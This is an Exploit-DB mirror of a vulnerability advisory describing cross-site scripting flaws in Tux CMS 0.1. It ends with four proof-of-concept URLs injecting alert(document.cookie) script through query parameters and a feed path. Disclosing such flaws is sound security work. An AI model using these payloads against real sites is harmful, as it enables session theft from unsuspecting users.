exploit-db-mirror/platforms/php/webapps/31753.txt
Offensive Security c47758095a Updated 02_20_2014
2014-02-20 04:27:43 +00:00

9 lines
No EOL
849 B
Text
Executable file

source: http://www.securityfocus.com/bid/29090/info
Tux CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Tux CMS 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/?q=>"><script>alert(document.cookie)</script> http://www.example.com/tux-login.php?returnURL=>"><script>alert(document.cookie)</script> http://www.example.com/tux-login.php?returnURL=%00""><script>alert(document.cookie)</script> http://www.example.com/tux-syndication/atom.php/>"><ScRiPt>alert(document.cookie)</ScRiPt>